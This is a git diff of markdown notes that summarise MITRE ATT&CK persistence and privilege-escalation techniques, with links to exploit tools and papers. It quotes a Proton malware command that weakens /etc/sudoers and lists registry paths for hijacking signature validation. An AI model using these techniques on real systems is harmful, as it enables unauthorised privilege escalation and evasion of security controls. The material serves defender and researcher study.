* Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM)1.2 BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
* The interface to create and manage BITS jobs is accessible through PowerShell and the BITSAdmin tool.
* Adversaries may abuse BITS to download, execute, and even clean up after malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.456 BITS enabled execution may also allow Persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).
* BITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol.
@ -123,6 +141,16 @@
--------------------------------
## Browser Extensions
* [Browser Extensions - ATT&CK](https://attack.mitre.org/wiki/Technique/T1176)
* Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser's app store. Extensions generally have access and permissions to everything that the browser can access.
* Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so may not be difficult for malicious extensions to defeat automated scanners and be uploaded. Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser, to include credentials, and be used as an installer for a RAT for persistence. There have been instances of botnets using a persistent backdoor through malicious Chrome extensions. There have also been similar examples of extensions being used for command & control.
-------------------------------
## Change Default File Association
* [Change Default File Association - ATT&CK](https://attack.mitre.org/wiki/Technique/T1042)
@ -163,28 +191,11 @@
-------------------------------
## Cron Job
* [Cron Job - ATT&CK](https://attack.mitre.org/wiki/Technique/T1168)
* System-wide cron jobs are installed by modifying /etc/crontab while per-user cron jobs are installed using crontab with specifically formatted crontab files 1. This works on Mac and Linux systems.
* Both methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence234, to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.
#### Linux
* [Intro to Cron - unixgeeks](http://www.unixgeeks.org/security/newbie/unix/cron-1.html)
* [Scheduling Tasks with Cron Jobs - tutsplus](https://code.tutsplus.com/tutorials/scheduling-tasks-with-cron-jobs--net-8800)
#### OS X
* Per Apple’s developer documentation, there are two supported methods for creating periodic background jobs: launchd and cron1.
* Launchd
* Each Launchd job is described by a different configuration property list (plist) file similar to Launch Daemons or Launch Agents, except there is an additional key called StartCalendarInterval with a dictionary of time values. This only works on macOS and OS X.
* cron
* System-wide cron jobs are installed by modifying /etc/crontab while per-user cron jobs are installed using crontab with specifically formatted crontab files. This works on Mac and Linux systems.
* Both methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence234, to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.
## Create Account
* [Create Account - ATT&CK](https://attack.mitre.org/wiki/Technique/T1136)
* Adversaries with a sufficient level of access may create a local system or domain account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
The `net user` commands can be used to create a local or domain account.
-------------------------------
@ -202,9 +213,8 @@
## Dylib Hijacking
---------------
## Dylib Hijacking
* [Dylib Hijacking - ATT&CK](https://attack.mitre.org/wiki/Technique/T1157)
* macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence.
* A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itselfWriting Bad Malware for OSXMalware Persistence on OS X.
@ -263,6 +273,33 @@
* Users can mark specific files as hidden by using the attrib.exe binary. Simply do attrib +h filename to mark a file or folder as hidden. Similarly, the “+s” marks a file as a system file and the “+r” flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively “/S”.
----------------------------
## Hooking
* [Hooking - ATT&CK](https://attack.mitre.org/wiki/Technique/T1179)
* Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. Hooking involves redirecting calls to these functions and can be implemented via:
* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.
* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.
* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.
* Similar to Process Injection, adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.
* Malicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access.
* Hooking is commonly utilized by Rootkits to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors.
* **Tools**
* [Hooks Overview - msdn.ms](https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx)
* [Userland Rootkits: Part 1, IAT hooks - adlice.com](https://www.adlice.com/userland-rootkits-part-1-iat-hooks/)
* [Dynamic Hooking Techniques: User Mode - matt hillman](https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/)
* [Inline Hooking in Windows](https://webcache.googleusercontent.com/search?q=cache:mkBFZwQOVQAJ:https://www.exploit-db.com/docs/17802.pdf+&cd=1&hl=en&ct=clnk&gl=us)
* [gethooks](https://github.com/jay/gethooks)
* GetHooks is a program designed for the passive detection and monitoring of hooks from a limited user account.
* [winhook](https://github.com/prekageo/winhook)
-------------------------------
## Hypervisor
* [Hypervisor - ATT&CK](https://attack.mitre.org/wiki/Technique/T1062)
@ -271,6 +308,10 @@
---------------------------
## Image File Execution Options Injection
* [Image File Execution Options Injection - ATT&CK](https://attack.mitre.org/wiki/Technique/T1183)
@ -294,6 +335,14 @@
-------------------------------
## LSASS Driver
* [LSASS Driver - ATT&CK](https://attack.mitre.org/wiki/Technique/T1177)
* The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
* Adversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., DLL Side-Loading or DLL Search Order Hijacking), an adversary can achieve arbitrary code execution triggered by continuous LSA operations.
-------------------------------
## Launch Agent
@ -330,16 +379,6 @@
-------------------------------
## Local Port Monitor
* [Local Port Monitor - ATT&CK](https://attack.mitre.org/wiki/Technique/T1013)
* A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.AddMonitor This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot.Bloxham Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors.Bloxham The spoolsv.exe process also runs under SYSTEM level permissions. Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.
#### Windows
* [AddMonitor function](https://msdn.microsoft.com/en-us/library/dd183341)
-------------------------------
## Login Item
@ -484,6 +523,32 @@ Netsh Helper DLL
-------------------------------
## Port Knocking
* [Port Knocking - ATT&CK](https://attack.mitre.org/wiki/Technique/T1205)
* Port Knocking is a well-established method used by both defenders and adversaries to hide open ports from access. To enable the port, the system expects a series of packets with certain characteristics before the port will be opened. This is often accomlished by the host based firewall, but could also be implemented by custom software.
* This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
* The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r, is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
-------------------------------
## Port Monitors
* [Port Monitors - ATT&CK](https://attack.mitre.org/wiki/Technique/T1013)
* A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.1 This DLL can be located in `C:\Windows\System32` and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors`. The Registry key contains entries for the following:
* Local Port
* Standard TCP/IP Port
* USB Monitor
* WSD Port
* Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.
-------------------------------
## Rc.common
* [Rc.common - ATT&CK](https://attack.mitre.org/wiki/Technique/T1163)
@ -533,6 +598,20 @@ Netsh Helper DLL
-------------------------------
## SIP and Trust Provider Hijacking
* [SIP and Trust Provider Hijacking - ATT&CK](https://attack.mitre.org/wiki/Technique/T1198)
* In user mode, Windows Authenticode1 digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature.
* Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all ) and are identified by globally unique identifiers (GUIDs).
* Similar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by:
* Modifying the `Dll` and `FuncName` Registry values in `HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}` that point to the dynamic link library (DLL) providing a SIP’s `CryptSIPDllGetSignedDataMsg` function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value all files using that SIP6 (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the `Dll` and `FuncName` Registry values in `HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}` that point to the DLL providing a SIP’s `CryptSIPDllVerifyIndirectData` function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP6 (with or without hijacking the previously mentioned `CryptSIPDllGetSignedDataMsg` function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
* Modifying the `DLL` and `Function` Registry values in `HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}` that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s `CryptSIPDllVerifyIndirectData` function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* Note: The above hijacks are also possible without modifying the Registry via DLL Search Order Hijacking.
* Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation.
@ -622,6 +701,15 @@ Netsh Helper DLL
-------------------------------
## Time Providers
* [Time Providers - ATT&CK](https://attack.mitre.org/wiki/Technique/T1209)
* The Windows Time service (W32Time) enables time synchronization across and within domains. W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.
* Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\`. The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.
* Adversaries may abuse this architecture to establish Persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.
-------------------------------


+ 110
- 51
Draft/ATT&CK-Stuff/Privilege_Escalation.md View File

@ -51,6 +51,19 @@
-------------------------------
## AppCert DLLs
* [AppCert DLLs - ATT&CK](https://attack.mitre.org/wiki/Technique/T1182)
* Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager are loaded into every process that calls the ubiquitously used application programming interface (API) functions:1
* CreateProcess
* CreateProcessAsUser
* CreateProcessWithLoginW
* CreateProcessWithTokenW
* WinExec
* Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.
-------------------------------
## AppInit DLLs
* [AppInit DLLs - ATT&CK](https://attack.mitre.org/wiki/Technique/T1103)
@ -158,9 +171,9 @@
## Dylib Hijacking
---------------
## Dylib Hijacking
* [Dylib Hijacking - ATT&CK](https://attack.mitre.org/wiki/Technique/T1157)
* macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence.
* A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itselfWriting Bad Malware for OSXMalware Persistence on OS X.
@ -172,45 +185,32 @@
---------------
## Exploitation for Privilege Escalation
* [Exploitation for Privilege Escalation - ATT&CK](https://attack.mitre.org/wiki/Technique/T1068)
* Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform Privilege Escalation to include use of software exploitation to circumvent those restrictions.
* When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising a endpoint system that has been properly configured and limits other privilege escalation methods.
---------------
## Extra Window Memory Injection
* [Extra Window Memory Injection - ATT&CK](https://attack.mitre.org/wiki/Technique/T1181)
* Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).1 Registration of new windows classes can include a request for up to 40 bytes of extra window memory (EWM) to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value.
* Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.
* Execution granted through EWM injection may take place in the address space of a separate live process. Similar to Process Injection, this may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread. More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process.
-------------------------------
## Exploitation of Vulnerability
* [Exploitation of Vulnerability - ATT&CK](https://attack.mitre.org/wiki/Technique/T1068)
* Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Exploiting software vulnerabilities may allow adversaries to run a command or binary on a remote system for lateral movement, escalate a current process to a higher privilege level, or bypass security mechanisms. Exploits may also allow an adversary access to privileged accounts and credentials. One example of this is MS14-068, which can be used to forge Kerberos tickets using domain user permissions.Technet MS14-068ADSecurity Detecting Forged Tickets
#### Linux
* [unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)
* Shell script to check for simple privilege escalation vectors on Unix systems. Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).
* [LinEnum](https://github.com/rebootuser/LinEnum)
* Scripted Local Linux Enumeration & Privilege Escalation Checks
* [linux-exploit-suggester.sh](https://github.com/mzet-/linux-exploit-suggester)
* linux-exploit-suggester.sh was inspired by the excellent Linux_Exploit_Suggester script by PenturaLabs. The issue with Pentura's script however is that it isn't up to date anymore (the script was last updated in early 2014) so it lacks some recent Linux kernel exploits. linux-exploit-suggester.sh on the other hand also contains all the latest (as of early 2017) publicly known Linux kernel exploits. It is also capable to identify possible privilege escalation vectors via installed userspace packages and comes with some additional minor features that makes finding right exploit more time efficient.
* [cve-check-tool - Intel](https://github.com/clearlinux/cve-check-tool)
* Original Automated CVE Checking Tool
* [Linux Kernel Exploitation - xairy github](https://github.com/xairy/linux-kernel-exploitation)
* [Vuls: Vulnerability Scanner](https://github.com/future-architect/vuls)
* Vulnerability scanner for Linux/FreeBSD, agentless, written in golang.
* [cvechecker](https://github.com/sjvermeu/cvechecker)
* The goal of cvechecker is to report about possible vulnerabilities on your system, by scanning a list of installed software and matching results with the CVE database. This is not a bullet-proof method and you will have many false positives (ie: vulnerability is fixed with a revision-release, but the tool isn't able to detect the revision itself), yet it is still better than nothing, especially if you are running a distribution with little security coverage.
* [kernel-exploits - xairy](https://github.com/xairy/kernel-exploits)
* A bunch of proof-of-concept exploits for the Linux kernel
#### OS X
* [physmem](https://github.com/bazad/physmem)
* physmem is a physical memory inspection tool and local privilege escalation targeting macOS up through 10.12.1. It exploits either CVE-2016-1825 or CVE-2016-7617 depending on the deployment target. These two vulnerabilities are nearly identical, and exploitation can be done exactly the same. They were patched in OS X El Capitan 10.11.5 and macOS Sierra 10.12.2, respectively.
* [macOS High Sierra 10.13.1 insecure cron system](https://m4.rkw.io/blog/macos-high-sierra-10131-insecure-cron-system.html)
* Easy root
* [Exploiting appliances presentation v1.1](https://www.slideshare.net/NCC_Group/exploiting-appliances-presentation-v11vidsremoved)
* [async_wake](https://github.com/benjibobs/async_wake)
* async_wake - iOS 11.1.2 kernel exploit and PoC local kernel debugger by @i41nbeer
* [IOHIDeous](https://siguza.github.io/IOHIDeous/)
* [OS X El Capitan - Sinking the S\H/IP - Stefan Esser - Syscan360 - 2016](https://www.syscan360.org/slides/2016_SG_Stefan_Esser_OS_X_El_Capitan_Sinking_The_SHIP.pdf)
* [ZeroNights / Syscan360 2016] Abusing the Mac Recovery & OS Update Process](https://speakerdeck.com/patrickwardle/syscan360-2016-abusing-the-mac-recovery-and-os-update-process)
* Did you know that Macs contain a secondary OS that sits hidden besides OS X? This talk will initially dive into technical details of the Recovery OS, before showing that while on (newer) native hardware Apple verifies this OS, in virtualized environments this may not be the case. Due to this 'flaw' we'll describe how an attacker can infect a virtualized OS X instance with malware that is able to survive a full OS X restore. Though limited to virtual instances, such malware can also abuse this process install itself into SIP'd locations making disinfection far more difficult. It's also worth noting that this attack likely would succeed on older versions of non-virtualized OS X as well.
#### Windows
* [Windows Exploit Suggester](https://github.com/AJMartel/Windows-Exploit-Suggester)
@ -230,6 +230,30 @@
----------------------------
## Hooking
* [Hooking - ATT&CK](https://attack.mitre.org/wiki/Technique/T1179)
* Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. Hooking involves redirecting calls to these functions and can be implemented via:
* Hooks procedures, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.12
* Import address table (IAT) hooking, which use modifications to a process’s IAT, where pointers to imported API functions are stored.234
* Inline hooking, which overwrites the first bytes in an API function to redirect code flow.254
* Similar to Process Injection, adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.
* Malicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access.6
* Hooking is commonly utilized by Rootkits to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors.7
* [Hooks Overview - msdn.ms](https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx)
* [Userland Rootkits: Part 1, IAT hooks - adlice.com](https://www.adlice.com/userland-rootkits-part-1-iat-hooks/)
* [Dynamic Hooking Techniques: User Mode - matt hillman](https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/)
* [Inline Hooking in Windows](https://webcache.googleusercontent.com/search?q=cache:mkBFZwQOVQAJ:https://www.exploit-db.com/docs/17802.pdf+&cd=1&hl=en&ct=clnk&gl=us)
* [gethooks](https://github.com/jay/gethooks)
* GetHooks is a program designed for the passive detection and monitoring of hooks from a limited user account.
* [winhook](https://github.com/prekageo/winhook)
---------------------------
## Image File Execution Options Injection
* [Image File Execution Options Injection - ATT&CK](https://attack.mitre.org/wiki/Technique/T1183)
@ -257,21 +281,6 @@
-------------------------------
## Local Port Monitor
* [Local Port Monitor - ATT&CK](https://attack.mitre.org/wiki/Technique/T1013)
* A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.AddMonitor This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot.Bloxham Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors.Bloxham` The spoolsv.exe process also runs under SYSTEM level permissions. Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.
#### Windows
* [AddMonitor function](https://msdn.microsoft.com/en-us/library/dd183341)
-------------------------------
## New Service
@ -334,6 +343,25 @@ Search Order Hijacking
-------------------------------
## Port Monitors
* [Port Monitors - ATT&CK](https://attack.mitre.org/wiki/Technique/T1013)
* A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. This DLL can be located in `C:\Windows\System32` and will be loaded by the print spooler service, spoolsv.exe, on boot. The `spoolsv.exe` process also runs under `SYSTEM` level permissions. Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors`. The Registry key contains entries for the following:
Local Port
Standard TCP/IP Port
USB Monitor
WSD Port
Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.
#### Windows
* [AddMonitor function](https://msdn.microsoft.com/en-us/library/dd183341)
-------------------------------
## Process Injection
* [Process Injection - ATT&CK](https://attack.mitre.org/wiki/Technique/T1055)
@ -359,6 +387,19 @@ There are multiple approaches to injecting code into a live process. Windows imp
-------------------------------
## SID-History Injection
* [SID-History Injection - ATT&CK](https://attack.mitre.org/wiki/Technique/T1178)
* The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. An account can hold additional SIDs in the SID-History Active Directory attribute, allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
* Adversaries may use this mechanism for privilege escalation. With Domain Administrator (or equivalent) rights, harvested or well-known SID values may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as Remote Services, Windows Admin Shares, or Windows Remote Management.
-------------------------------
## Scheduled Tasks
* [Scheduled Tasks - ATT&CK](https://attack.mitre.org/wiki/Technique/T1053)
@ -379,6 +420,8 @@ There are multiple approaches to injecting code into a live process. Windows imp
-------------------------------
## Service Registry Permissions Weakness
* [Service Registry Permissions Weakness - ATT&CK](https://attack.mitre.org/wiki/Technique/T1058)
@ -417,6 +460,13 @@ There are multiple approaches to injecting code into a live process. Windows imp
* [SID-History attribute - msdn.ms](https://msdn.microsoft.com/library/ms679833.aspx)
* [Well-known security identifiers in Windows operating systems](https://support.microsoft.com/en-us/help/243330/well-known-security-identifiers-in-windows-operating-systems)
-------------------------------
## Startup Items
* [Startup Items - ATT&CK](https://attack.mitre.org/wiki/Technique/T1165)
@ -441,6 +491,15 @@ There are multiple approaches to injecting code into a live process. Windows imp
-------------------------------
## Sudo Caching
* [Sudo Caching - ATT&CK](https://attack.mitre.org/wiki/Technique/T1206)
* The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments" . Since sudo was made for the system administrator, it has some useful configuration features such as a `timestamp_timeout` that is the amount of time in minutes between instances of `sudo` before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at `/var/db/sudo` with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a `tty_tickets` variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).
* Adversaries can abuse poor configurations of this to escalate privileges without needing the user's password. `/var/db/sudo`'s timestamp can be monitored to see if it falls within the `timestamp_timeout` range. If it does, then malware can execute sudo commands without needing to supply the user's password. Combined with `tty_tickets` being disabled, means adversaries can do this from any tty for that user.
* The OSX Proton Malware has disabled `tty_tickets` to potentially make scripting easier by issuing echo `\'Defaults !tty_tickets\' >> /etc/sudoers`. In order for this change to be reflected, the Proton malware also must issue `killall Terminal`. As of macOS Sierra, the sudoers file has `tty_tickets` enabled by default.
---------------------
## Valid Accounts


+ 7
- 1
Draft/AnonOpsecPrivacy.md View File

@ -38,9 +38,15 @@
* [A Technical Description of Psiphon](https://psiphon.ca/en/blog/psiphon-a-technical-description)
* [Invasion of Privacy - HackerFactor](http://www.hackerfactor.com/blog/index.php?/archives/703-Invasion-of-Privacy.html)
* [What Happens Next Will Amaze You](http://idlewords.com/talks/what_happens_next_will_amaze_you.htm#six_fixes)
* [RF-Capture](http://rfcapture.csail.mit.edu/)
* RF-Capture is a device that captures a human figure through walls and occlusions. It transmits wireless signals and reconstructs a human figure by analyzing the signals' reflections. RF-Capture does not require the person to wear any sensor, and its transmitted power is 10,000 times lower than that of a standard cell-phone.
* [Paper](http://rfcapture.csail.mit.edu/rfcapture-paper.pdf)
* [Cookieless Monster: Exploring the Ecosystem of Web-based Device Fingerprinting](http://securitee.org/files/cookieless_sp2013.pdf)
* Abstract —The web has become an essential part of our society and is currently the main medium of information delivery. Billions of users browse the web on a daily basis, and there are single websites that have reached over one billion user accounts. In this environment, the ability to track users and their online habits can be very lucrative for advertising companies, yet very intrusive for the privacy of users. In this paper, we examine how web-based device fingerprint- ing currently works on the Internet. By analyzing the code of three popular browser-fingerprinting code providers, we reveal the techniques that allow websites to track users without the need of client-side identifiers. Among these techniques, we show how current commercial fingerprinting approaches use questionable practices, such as the circumvention of HTTP proxies to discover a user’s real IP address and the installation of intrusive browser plugins. At the same time, we show how fragile the browser ecosystem is against fingerprinting through the use of novel browser- identifying techniques. With so many different vendors involved in browser development, we demonstrate how one can use diversions in the browsers’ implementation to distinguish successfully not only the browser-family, but also specific major and minor versions. Browser extensions that help users spoof the user-agent of their browsers are also evaluated. We show that current commercial approaches can bypass the extensions, and, in addition, take advantage of their shortcomings by using them as additional fingerprinting features.
* [Understanding & Improving Privacy "Audits" under FTC Orders](https://cyberlaw.stanford.edu/blog/2018/04/understanding-improving-privacy-audits-under-ftc-orders)
* This new white paper, entitled “Understanding and Improving Privacy ‘Audits’ under FTC Orders,” carefully parses the third-party audits that Google and Facebook are required to conduct under their 2012 Federal Trade Commission consent orders. Using only publicly available documents, the article contrasts the FTC’s high expectations for the audits with what the FTC actually received (as released to the public in redacted form). These audits, as a practical matter, are often the only “tooth” in FTC orders to protect consumer privacy. They are critically important to accomplishing the agency’s privacy mission. As such, a failure to attend to their robust enforcement can have unintended consequences, and arguably, provide consumers with a false sense of security. The paper shows how the audits are not actually audits as commonly understood. Instead, because the FTC order language only requires third-party “assessments,” the companies submit reports that are termed “attestations.” Attestations fundamentally rely on a few vague privacy program aspects that are self-selected by the companies themselves. While the FTC could reject attestation-type assessments, the agency could also insist the companies bolster certain characteristics of the attestation assessments to make them more effective and replicate audit attributes. For example, the FTC could require a broader and deeper scope for the assessments. The agency could also require that assessors evaluate Fair Information Practices, data flows, notice/consent effectiveness, all company privacy assurances, and known order violations.
#### end Sort


+ 2
- 1
Draft/Attacking Defending Android -.md View File

@ -46,7 +46,8 @@ https://github.com/doridori/Android-Security-Reference
* Android Vulnerabilities Overview (AVO) is a databse of known security vulnerabilities in Android.
https://blog.gdssecurity.com/labs/2015/2/18/when-efbfbd-and-friends-come-knocking-observations-of-byte-a.html
* [Diggy](https://github.com/UltimateHackers/Diggy)
* Diggy can extract endpoints/URLs from apk files. It saves the result into a txt file for further processing.
[Intercepting HTTPS traffic of Android Nougat Applications](https://serializethoughts.com/2016/09/10/905/)
* TL;DR To intercept network traffic for Android 7.0 targeted applications, introduce a res/xml/network_security_config.xml file.


+ 13
- 0
Draft/Basic Security Information.md View File

@ -3,11 +3,19 @@
### How to Suck at InfoSec
* [How to Suck at Information Security – A Cheat Sheet](https://zeltser.com/suck-at-security-cheat-sheet/)
* [How not to Infosec - Dan Tentler](https://www.youtube.com/watch?v=S5O47gemMNQ)
### Basic Information
* [Types of Authentication](http://www.gfi.com/blog/security-101-authentication-part-2/)
* [Access control best practices](https://srlabs.de/acs/)
@ -23,12 +31,17 @@
* [Infosec Tools of the Trade: Getting Your Hands Dirty](http://www.irongeek.com/i.php?page=videos/bsidesnashville2017/bsides-nashville-2017-green00-infosec-tools-of-the-trade-getting-your-hands-dirty-jason-smith-and-tara-wink)
* In this presentation we'll will be going over introductions to the various focuses in information security and demoing the most common tools that are used in operational security, both offense and defense. You'll leave with an idea on how to freely obtain and use these tools so that you can have what you need for that first interview: experience and a passion for security. This is a green talk for people who don't have a clue on what offensive and defensive people do operationally, from a tool perspective.
